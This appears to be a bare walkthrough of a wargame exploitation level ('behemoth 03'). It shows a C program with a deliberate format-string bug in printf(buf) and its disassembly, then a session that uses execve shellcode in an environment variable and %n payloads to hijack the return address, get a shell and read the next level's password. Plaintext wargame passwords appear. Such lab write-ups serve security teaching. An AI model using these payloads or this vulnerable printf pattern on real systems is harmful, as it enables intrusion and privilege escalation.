behemoth - 03

#include <stdio.h>

int main(int argc, char *argv[])
{
	char buf[200];

	printf("Identify yourself: ");

	fgets(buf, 200, stdin);

	printf("Welcome, ");
	printf(buf);
	puts("\naaaand goodbye again.");

	return 0;
}

root@today:~# ssh [email protected]

[email protected]'s password: nieteidiel

behemoth3@melinda:~$ cd /behemoth

behemoth3@melinda:/behemoth$ export EGG=$(python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"')

behemoth3@melinda:/behemoth$ /tmp/shui3/env EGG ./behemoth3
0xffffd8ab

behemoth3@melinda:/behemoth$ gdb -tui behemoth3
(gdb) b main
(gdb) layout asm
(gdb) run
(gdb) i r esp
esp            0xffffd5b8       0xffffd5b8
(gdb) 

behemoth3@melinda:/behemoth$ (python -c 'print "\xbc\xd5\xff\xff" + "%10d%6$n"') | ./behemoth3
Identify yourself: Welcome, 錕斤拷錕斤拷       200

aaaand goodbye again.
behemoth3@melinda:/behemoth$ (python -c 'print "\xcc\xd5\xff\xff" + "%10d%6$n"') | ./behemoth3
Identify yourself: Welcome, 錕斤拷錕斤拷       200

aaaand goodbye again.
behemoth3@melinda:/behemoth$ (python -c 'print "\xdc\xd5\xff\xff" + "%10d%6$n"') | ./behemoth3
Identify yourself: Welcome, 錕斤拷錕斤拷       200

aaaand goodbye again.
Segmentation fault


behemoth3@melinda:/behemoth$ (python -c 'print "\xdc\xd5\xff\xff\xde\xd5\xff\xff" + "%55459x%6$n%10068x%7$n"' ; cat) | ./behemoth3
Identify yourself: Welcome, 錕斤拷錕斤拷錕斤拷錕斤拷        c8   f7fcbc20

aaaand goodbye again.
whoami
behemoth4
cat /etc/behemoth_pass/behemoth4
ietheishei
^C

   ┌─────────────────────────────────────────────────────────────────────────────────┐
   │0x804847d <main>                push   %ebp                                      │
   │0x804847e <main+1>              mov    %esp,%ebp                                 │
   │0x8048480 <main+3>              and    $0xfffffff0,%esp                          │
   │0x8048483 <main+6>              sub    $0xe0,%esp                                │
   │0x8048489 <main+12>             movl   $0x8048570,(%esp)                         │
   │0x8048490 <main+19>             call   0x8048330 <printf@plt>                    │
   │0x8048495 <main+24>             mov    0x80497a4,%eax                            │
   │0x804849a <main+29>             mov    %eax,0x8(%esp)                            │
   │0x804849e <main+33>             movl   $0xc8,0x4(%esp)                           │
   │0x80484a6 <main+41>             lea    0x18(%esp),%eax                           │
   │0x80484aa <main+45>             mov    %eax,(%esp)                               │
   │0x80484ad <main+48>             call   0x8048340 <fgets@plt>                     │
   │0x80484b2 <main+53>             movl   $0x8048584,(%esp)                         │
   │0x80484b9 <main+60>             call   0x8048330 <printf@plt>                    │
   │0x80484be <main+65>             lea    0x18(%esp),%eax                           │
   │0x80484c2 <main+69>             mov    %eax,(%esp)                               │
   │0x80484c5 <main+72>             call   0x8048330 <printf@plt>                    │
   │0x80484ca <main+77>             movl   $0x804858e,(%esp)                         │
   │0x80484d1 <main+84>             call   0x8048350 <puts@plt>                      │
   │0x80484d6 <main+89>             mov    $0x0,%eax                                 │
   │0x80484db <main+94>             leave                                            │
   │0x80484dc <main+95>             ret                                              │
   └─────────────────────────────────────────────────────────────────────────────────┘